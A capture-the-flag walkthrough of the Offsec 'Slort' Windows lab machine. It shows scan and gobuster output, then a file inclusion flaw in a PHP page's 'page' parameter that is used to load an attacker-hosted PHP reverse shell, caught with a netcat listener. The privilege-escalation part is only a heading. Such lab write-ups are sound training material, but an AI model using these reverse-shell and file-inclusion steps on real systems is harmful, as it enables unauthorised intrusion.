Slort Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)

1. Scanning

─$ rustscan -a $IP -- -sV -sC -Pn

matrix(0.00634765 0 0 0.00634765 -1.26953 8.81689)
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
3306/tcp  open  mysql         syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
4443/tcp  open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.224.53:4443/dashboard/
5040/tcp  open  unknown       syn-ack ttl 125
7680/tcp  open  pando-pub?    syn-ack ttl 125
8080/tcp  open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.224.53:8080/dashboard/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 47958/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 43822/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 22925/udp): CLEAN (Timeout)
|   Check 4 (port 13188/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 0s
| smb2-time: 
|   date: 2025-09-02T12:11:10
|_  start_date: N/A

2. Enumeartion

Enumerating FTP port 21

Starting with anonymous,admin login --> Failed

We have the version FileZilla ftpd 0.9.41 beta, Looked into searchsploit does not seem to be directly vulnerable. we can come back to this later.

Enumearting HTTP

Port 4443 Enumeartion

We'll enumearte web apps first there are generally high chances for vulnearbilities

alt text On the first glance it is redirecting to the default page for XAMPP apache.

alt text Can't access PHPmyadmin page.

While looking into the phpinfo page, we found a user rupert

alt text

Using Gobuster we found a site alt text

Port 8080 Enumeartion

It also has the same page as 4443.. Strange

After digging little and using Gobuster found a Site

└─$ gobuster dir --url $URL --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x txt,pdf,conf 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.224.53:8080
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,pdf,conf
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 345] [--> http://192.168.224.53:8080/img/]
/site                 (Status: 301) [Size: 346] [--> http://192.168.224.53:8080/site/]
/examples             (Status: 503) [Size: 1060]
/licenses             (Status: 403) [Size: 1205]
/dashboard            (Status: 301) [Size: 351] [--> http://192.168.224.53:8080/dashboard/]
/%20                  (Status: 403) [Size: 1046]
/IMG                  (Status: 301) [Size: 345] [--> http://192.168.224.53:8080/IMG/]
/Site                 (Status: 301) [Size: 346] [--> http://192.168.224.53:8080/Site/]

alt text

Narrowed down to both the sites are same , Looks like it was hosted on 2 ports. looking at the website http://192.168.224.53:4443/site/index.php?page=main.php we can test for file inclusion vulnearbility.

On initial testing I quickely found LFI alt text

Let's test for RFI as well. So we'll use cp /usr/share/webshells/php/php-reverse-shell.php . and host on kali machine and try to access it through the website..

changing the required paremeters IP and port in the script alt text

Hosting on kali machine

└─$ sudo python3 -m http.server 80

Opening a listner in kali machine

nc -nvlp 21

alt text

Successfully failed 😅, So We'll try a different reverse shell .

Initial access

After some failures I was able to find a PhpReverseShell.php and it worked.

Called from the site

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

alt text

1. Scanning​

2. Enumeartion​

Enumerating FTP port 21​

Enumearting HTTP​

Port 4443 Enumeartion​

Port 8080 Enumeartion​

Initial access​

Privilege Escalation​

1. Scanning

2. Enumeartion

Enumerating FTP port 21

Enumearting HTTP

Port 4443 Enumeartion

Port 8080 Enumeartion

Initial access

Privilege Escalation